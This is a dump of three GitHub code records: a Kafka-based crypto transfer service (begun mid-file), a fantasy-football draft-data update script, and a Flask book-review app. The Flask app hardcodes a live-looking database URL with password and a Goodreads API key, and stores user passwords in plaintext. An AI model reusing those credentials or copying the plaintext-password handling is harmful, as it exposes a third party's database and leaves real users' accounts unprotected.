fee_amount=Decimal(fee),\n    )\n    sended = Producer.send_kafka_message(\n        topic=settings.KAFKA_NOTBANK_SYNC_TOPIC,\n        message=conversion.to_sync_task_trama())\n    if not sended:\n        raise NotBankKafkaException(\n            \"failed to send to notbank-sync kafka topic\")\n\n    sended = Producer.send_kafka_message(\n        topic=settings.KAFKA_BALANCE_MANAGER_TASK_TOPIC,\n        message=conversion.to_balance_manager_task_trama())\n    if not sended:\n        raise NotBankKafkaException(\n            \"failed to send to balance-manager-task kafka topic\")\n    return conversion.task_id\n\n\ndef get_quote(*, request_id: str) -> Optional[Quote]:\n    try:\n        return Quote.objects.get(request_id=request_id)\n    except Quote.DoesNotExist:\n        return None\n\n\ndef get_current_conversions(*, status: str, creation_date: str) -> List[CurrentConversion]:\n    if status:\n        return list(CurrentConversion.objects.filter(active=status).order_by('-created_at'))\n    if creation_date:\n        return list(CurrentConversion.objects.filter(created_at=creation_date).order_by('-created_at'))\n    # Fall through: honour the annotated return type instead of returning None\n    return []\n\n\ndef get_transfer_request_list_of_user(*, user_uuid: str) -> List[TransferRequest]:\n    return list(TransferRequest.objects.filter(transaction__to_user__user_uuid=user_uuid))\n\n\ndef get_transfer_of_user(*, user_uuid: str) -> List[Transfer]:\n    return list(Transfer.objects.filter(from_user__uuid=user_uuid))\n\n\ndef get_all_transfers(*, status: str, creation_date: str) -> List[Transfer]:\n    if status:\n        return list(Transfer.objects.filter(status=status).order_by('-amount'))\n    if creation_date:\n        return list(Transfer.objects.filter(created_at=creation_date).order_by('-amount'))\n    # Fall through: honour the annotated return type instead of returning None\n    return []\n\n\ndef sync_transfer_request(\n        transfer_request: TransferRequest\n) -> None:\n    sended = Producer.send_kafka_message(\n        topic=settings.KAFKA_NOTBANK_SYNC_TOPIC,\n        message=transfer_request.to_sync_task_trama())\n    if not sended:\n        raise NotBankKafkaException(\n            \"failed to send to notbank internal kafka topic\")\n    return\n\n\ndef sync_new_transfer_request(\n        from_user_uuid: str,\n        to_user_uuid: str,\n        currency: str,\n        amount: str,\n        fee_amount: str,\n        description: str,\n) -> None:\n    transfer_request = TransferRequest(\n        transfer=Transfer(\n            task_id=uuid.uuid4(),\n            from_user=User.objects.get(uuid=from_user_uuid),\n            to_user=User.objects.get(uuid=to_user_uuid),\n            currency=currency,\n            amount=Decimal(amount),\n            fee_amount=Decimal(fee_amount),\n            description=description,\n        ),\n        status=TransferRequest.STATUS.PENDING,\n    )\n    sync_transfer_request(transfer_request)\n\n\ndef accept_or_reject_transfer_request(task_id: str, accept: bool):\n    try:\n        transfer_request: TransferRequest =
 TransferRequest.objects.get(\n            task_id=task_id\n        )\n    except TransferRequest.DoesNotExist:\n        raise TransferRequestNotFoundException()\n\n    if transfer_request.status != transfer_request.STATUS.PENDING:\n        raise TransferRequestAlreadyCommitedException()\n    if accept:\n        # we only send to balance manager when the transfer is accepted\n        # timestamp here is the time of the transaction (now)\n        # not the time of the creation of the transfer (transfer.created_at)\n        transfer: Transfer = transfer_request.transfer\n        balance_manager_task = transfer.to_balance_manager_task()\n        balance_manager_task.timestamp = get_timestamp()\n        sended = Producer.send_kafka_message(\n            topic=settings.KAFKA_BALANCE_MANAGER_TASK_TOPIC,\n            message=balance_manager_task.to_trama(),\n        )\n        if not sended:\n            raise NotBankKafkaException(\n                'failed to send kafka message to balance manager task topic')\n    # we always propagate\n    new_status = {\n        True: TransferRequest.STATUS.ACCEPTED,\n        False: TransferRequest.STATUS.REJECTED,\n    }\n    transfer_request.status = new_status[accept]\n    sync_transfer_request(transfer_request)\n","repo_name":"cjmont/crypto_conversion_kafka","sub_path":"backend/notbank/transactions/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":9022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"7902061895","text":"from app.database.queries import connect_to_db\nimport pandas as pd\n\n# Run this code to update the draft_picks table with the budget_percent, draft_value and budget_amount columns\n\n# Load your CSV data into a DataFrame\ndf = pd.read_csv(r\"C:\\\\Users\\\\Admin\\\\Desktop\\\\FFLBot\\\\GPT_FFL\\\\River_City_Draft_Data.csv\", dtype={'draft_id': str})\n\n# Filter data from 2018 onwards and drop any rows that contain null values in Owner_id, League_id or player_id\ndf = df[df['Season'] >= 2018]\ndf = df.dropna(subset=['Owner_id', 'League_id', 'player_id'])\n\n\ndef update_draft_picks_with_budget_percent(df):\n    # Use the existing connect_to_db function to establish a connection to the PostgreSQL database\n    conn, cur = connect_to_db()\n\n    # Iterate through the rows of the DataFrame\n    for _, row in df.iterrows():\n        # Define the SQL query for updating the draft_picks table\n        query = \"\"\"\n        UPDATE draft_picks\n        SET budget_percent = %s, draft_value = %s, budget_amount = %s\n        WHERE player_id = %s AND picked_by = %s AND draft_id = %s\n        \"\"\"\n        # Execute the SQL query with the data from the DataFrame row.\n        # The original tuple passed seven values (an extra row['Owner']) for\n        # six placeholders; it now matches the query one-for-one.\n        cur.execute(query, (row['Budget%'], row['Draft Value'], row['Budget'],\n                            row['player_id'], str(row['Owner_id']), str(row['draft_id'])))\n\n        # Check how many rows were affected\n        rows_affected = cur.rowcount\n        if rows_affected == 0:\n            print(f\"No rows updated for player_id {row['player_id']}, picked_by {str(row['Owner_id'])}, draft_id {str(row['draft_id'])}\")\n        else:\n            print(f\"{rows_affected} row(s) updated for player_id {row['player_id']}, picked_by {str(row['Owner_id'])}, draft_id {str(row['draft_id'])}\")\n\n    # Commit the changes and close the connection\n    conn.commit()\n    cur.close()\n    conn.close()\n\n\n# Call the function with your DataFrame (this call sat inside the function\n# body in the original, which would have recursed instead of running once)\nupdate_draft_picks_with_budget_percent(df)\n","repo_name":"wcameron14/FFLAnalyzer","sub_path":"archive/add_draft_data.py","file_name":"add_draft_data.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"39556981133","text":"#This Python Application is Written By Mohammed Zahid Wadiwale\nimport os\nfrom flask import Flask, session\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom flask import Flask, render_template, flash, redirect, request, abort, url_for, jsonify\nimport json\nimport requests\n\napp = Flask(__name__)\napp.config['DATABASE_URL'] = \"postgres://nkweeotaiaocev:cd2afe545b2364432178fb4333d2f6aa12c74bd0bb1ba1804840a93cc218a23c@ec2-79-125-26-232.eu-west-1.compute.amazonaws.com:5432/daqdsbbqpv9hrd\"\nos.environ[\"DATABASE_URL\"] = \"postgres://nkweeotaiaocev:cd2afe545b2364432178fb4333d2f6aa12c74bd0bb1ba1804840a93cc218a23c@ec2-79-125-26-232.eu-west-1.compute.amazonaws.com:5432/daqdsbbqpv9hrd\"\napp.secret_key = os.urandom(24) \n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"), pool_size=10, max_overflow=10)\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n@app.route(\"/\")\ndef index():\n\tif not session.get('logged_in'):\n\t\treturn home()\n\telse:\n\t\treturn render_template(\"index.html\")\n@app.route(\"/home\")\ndef home():\n\tif not session.get('logged_in'):\n\t\treturn render_template(\"index2.html\")\n\telse:\n\t\treturn index()\n@app.route(\"/logout\")\ndef logout():\n\tif session.get('logged_in'):\n\t\tsession.clear()\n\t\treturn index()\n@app.route(\"/login\", methods=['POST','GET'])\ndef login():\n\tif session.get('logged_in'):\n\t\treturn index()\n\terror = None\n\tif request.method == 'POST':\n\t\temail=request.form['email']\n\t\tpassword=request.form['password']\n\t\tlogon=db.execute(\"SELECT * FROM bookuser WHERE email=:it AND password=:itf\",{\"it\":email,\"itf\":password}).fetchone()\n\t\tif logon is None:\n\t\t\terror = 'Invalid Credentials. 
 Please try again.'\n\t\telse:\n\t\t\tsession['logged_in'] = request.form['email']\n\t\t\treturn redirect(url_for('index'))\n\treturn render_template('login.html', error=error)\n@app.route(\"/registar\", methods=['POST','GET'])\ndef registar():\n\tif session.get('logged_in'):\n\t\treturn index()\n\terror = None\n\tif request.method == 'POST':\n\t\temail=request.form['email']\n\t\tname=request.form['name']\n\t\tpassword=request.form['password']\n\t\tlogon2=db.execute(\"SELECT * FROM bookuser WHERE email=:it\",{\"it\":email}).fetchone()\n\t\tif logon2 is not None:\n\t\t\terror = 'This Email Already Exists'\n\t\telse:\n\t\t\tdb.execute(\"INSERT INTO bookuser (name,email,password) VALUES (:name,:email,:password)\",{'name':name,'email':email,'password':password})\n\t\t\tdb.commit()\n\t\t\treturn render_template('login.html', message=\"Account Successfully Created. Now Login\")\n\treturn render_template('registar.html', error=error)\n@app.route(\"/search\", methods=['POST','GET'])\ndef search():\n\n\tif request.method=='POST':\n\t\terror=None\n\t\tsearchit=request.form['k']\n\t\t# Bind the search term as a parameter; the original concatenated user\n\t\t# input straight into the SQL string (an injection vulnerability), and\n\t\t# its `search is None` check could never trigger\n\t\tpattern=\"%\"+searchit+\"%\"\n\t\tsearch=db.execute(\"SELECT * FROM books WHERE author LIKE :q OR title LIKE :q OR isbn LIKE :q\",{\"q\":pattern}).fetchall()\n\t\tif not search:\n\t\t\terror=\"No Results Found!\"\n\t\tif session.get('logged_in'):\n\t\t\treturn render_template('search.html', error=error,search=search,string=searchit)\n\t\telse:\n\t\t\treturn render_template('search2.html', error=error,search=search,string=searchit)\n\t# Fall back for plain GET requests, which previously returned None (a 500)\n\treturn redirect(url_for('index'))\n@app.route(\"/isbn/<isbn>\",methods=[\"GET\",\"POST\"])\ndef book(isbn):\n\t# The <isbn> URL variable was lost in the original listing, leaving\n\t# book(isbn) without a matching route parameter\n\tchechit=db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{\"isbn\":isbn}).fetchone()\n\tif chechit is None:\n\t\treturn render_template('404.html')\n\tif not session.get('logged_in'):\n\t\treturn login()\n\terror=\"\"\n\temail=session.get('logged_in')\n\tsecondreview=db.execute(\"SELECT * FROM reviews WHERE isbn = :isbn AND email= :email\",{\"email\":email,\"isbn\":isbn}).fetchone()\n\tdata=db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{\"isbn\":isbn}).fetchone()\n\tres = requests.get(\"https://www.goodreads.com/book/review_counts.json\", params={\"key\": \"YdT8QcJWE6ZvnDjMKIZgA\", \"isbns\": isbn})\n\taverage_rating=res.json()['books'][0]['average_rating']\n\twork_ratings_count=res.json()['books'][0]['work_ratings_count']\n\tif request.method==\"POST\" and secondreview is not None:\n\t\terror=\"Sorry.
 You cannot add a second review.\"\n\t\treviews=db.execute(\"SELECT * FROM reviews WHERE isbn = :isbn AND email=:email\",{\"isbn\":isbn,\"email\":email}).fetchall()\n\telif request.method==\"GET\" and secondreview is not None:\n\t\treviews=db.execute(\"SELECT * FROM reviews WHERE isbn = :isbn AND email=:email\",{\"isbn\":isbn,\"email\":email}).fetchall()\n\t\treturn render_template('book.html',data=data,email=email,error=error,reviews=reviews,average_rating=average_rating,rcounts=work_ratings_count)\n\telse:\n\t\treviews=None\n\tif request.method==\"POST\" and secondreview is None:\n\t\treview=request.form.get('textarea')\n\t\trating=request.form.get('stars')\n\t\tdb.execute(\"INSERT INTO reviews (isbn, review, rating, email) VALUES (:a,:b,:c,:d)\",{\"a\":isbn,\"b\":review,\"c\":rating,\"d\":email})\n\t\tdb.commit()\n\t\t# Redirect so the page is re-rendered via GET; the original re-entered\n\t\t# book(isbn) with the POST still active, which immediately produced the\n\t\t# \"second review\" error for the review that was just saved\n\t\treturn redirect(url_for('book', isbn=isbn))\n\treturn render_template('book.html',data=data,email=email,error=error,reviews=reviews,average_rating=average_rating,rcounts=work_ratings_count)\n@app.route(\"/api/<isbn>\")\ndef api(isbn):\n\tif not session.get('logged_in'):\n\t\treturn login()\n\tdata=db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{\"isbn\":isbn}).fetchone()\n\tif data is not None:\n\t\tres = requests.get(\"https://www.goodreads.com/book/review_counts.json\", params={\"key\": \"YdT8QcJWE6ZvnDjMKIZgA\", \"isbns\": isbn})\n\t\taverage_rating=res.json()['books'][0]['average_rating']\n\t\twork_ratings_count=res.json()['books'][0]['work_ratings_count']\n\t\tx = {\n\t\t\"title\": data.title,\n\t\t\"author\": data.author,\n\t\t\"year\": data.year,\n\t\t\"isbn\": isbn,\n\t\t\"review_count\": work_ratings_count,\n\t\t\"average_score\": average_rating\n\t\t}\n\t\tapi=json.dumps(x)\n\telse:\n\t\treturn jsonify({\"error\":\"Invalid ISBN\"}),422\n\treturn render_template(\"api.json\",api=api)\n","repo_name":"ZahidServers/Harvard-CS50-Project1-GoodReadsClone","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}